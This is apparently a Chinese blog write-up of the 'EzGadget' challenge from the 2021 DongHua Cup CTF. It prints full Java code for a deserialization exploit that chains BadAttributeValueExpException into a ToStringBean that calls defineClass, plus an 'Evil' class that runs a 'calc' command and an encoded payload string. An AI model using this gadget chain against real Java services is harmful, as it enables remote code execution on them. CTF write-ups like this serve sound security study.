东华杯2021 EzGadget


附件传不上来欸,直接看题吧
首先看路由发现反序列化的点
image.png
接着看pom.xml找有无利用的第三方组件
image.png
似乎只有 spring-boot,然后看其他源码,发现ToStringBean.java#toString()里面有defineClass(),这是好东西哇,在ClassLoader(类加载器)里面提到这是加载字节码的东西,所以目标明确,从 readObject()走到 toString()再到 defineClass(),正好在CC5中有 BadAttributeValueExpException 调用了 toString,所以直接一把梭

package com.yq1ng.ezgadget;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.net.URLEncoder;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

/**
 * @author ying
 * @Description 东华杯2021
 * @create 2021-11-10 5:27 PM
 */

public class GetFlag {
        public static void main(String[] args) throws Exception{
            //  利用cc5后半段
            BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
            Class clazz = Class.forName("javax.management.BadAttributeValueExpException");

            Field field = clazz.getDeclaredField("val");
            field.setAccessible(true);
            com.ezgame.ctf.tools.ToStringBean toStringBean = new com.ezgame.ctf.tools.ToStringBean();
            field.set(badAttributeValueExpException,toStringBean);

//            byte[] classByte = Base64.getDecoder().decode("yv66vgAAADQAKQoACAAZCgAaABsIABwKABoAHQcAHgoABQAfBwAgBwAhAQAJdHJhbnNmb3JtAQBy"+"KExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9v"+"cmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylW"+"AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHACIBAKYoTGNvbS9zdW4vb3Jn"+"L2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwv"+"aW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRl"+"cm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAGPGluaXQ+AQADKClWAQAN"+"U3RhY2tNYXBUYWJsZQcAIAcAHgEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAKU291"+"cmNlRmlsZQEACUV2aWwuamF2YQwAEAARBwAjDAAkACUBAA9jbWQgL2MgY2FsYy5leGUMACYAJwEA"+"E2phdmEvbGFuZy9FeGNlcHRpb24MACgAEQEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFs"+"YW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcv"+"YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5n"+"L1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhM"+"amF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAD3ByaW50U3RhY2tUcmFjZQAh"+"AAcACAAAAAAABAABAAkACgACAAsAAAAZAAAAAwAAAAGxAAAAAQAMAAAABgABAAAAEAANAAAABAAB"+"AA4AAQAJAA8AAgALAAAAGQAAAAQAAAABsQAAAAEADAAAAAYAAQAAABQADQAAAAQAAQAOAAEAEAAR"+"AAEACwAAAGAAAgACAAAAFiq3AAG4AAISA7YABFenAAhMK7YABrEAAQAEAA0AEAAFAAIADAAAABoA"+"BgAAABYABAAYAA0AHAAQABoAEQAbABUAHQASAAAAEAAC/wAQAAEHABMAAQcAFAQACQAVABYAAQAL"+"AAAAGQAAAAEAAAABsQAAAAEADAAAAAYAAQAAACAAAQAXAAAAAgAY");
            byte[] classByte = Files.readAllBytes(Paths.get("F:\\study\\temp\\target\\classes\\com\\yq1ng\\ezgadget\\Evil.class"));
            clazz = Class.forName("com.ezgame.ctf.tools.ToStringBean");
            field = clazz.getDeclaredField("ClassByte");
            field.setAccessible(true);
            field.set(toStringBean,classByte);

            ByteArrayOutputStream bout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(bout);
            oout.writeUTF("gadgets");
            oout.writeInt(2021);
            oout.writeObject(badAttributeValueExpException);
            byte[] bytes = bout.toByteArray();
            byte[] encode = Base64.getEncoder().encode(bytes);
            System.out.println(URLEncoder.encode(new String(encode)));
        }
}
package com.yq1ng.ezgadget;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

/**
 * @author ying
 * @Description
 * @create 2021-11-10 5:20 PM
 */

public class Evil extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    public Evil() {
        try {
            Runtime.getRuntime().exec("calc");
        }
        catch (Exception ex) {
            ex.printStackTrace();
        }
    }

    public static void main(final String[] array) {
    }
}
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//

package com.ezgame.ctf.tools;

import java.io.Serializable;

public class ToStringBean extends ClassLoader implements Serializable {
    private byte[] ClassByte;

    public ToStringBean() {
    }

    public String toString() {
        ToStringBean toStringBean = new ToStringBean();
        Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
        Object var3 = null;

        try {
            var3 = clazz.newInstance();
        } catch (InstantiationException var5) {
            var5.printStackTrace();
        } catch (IllegalAccessException var6) {
            var6.printStackTrace();
        }

        return "enjoy it.";
    }
}

文章作者: yq1ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yq1ng !
评论
  目录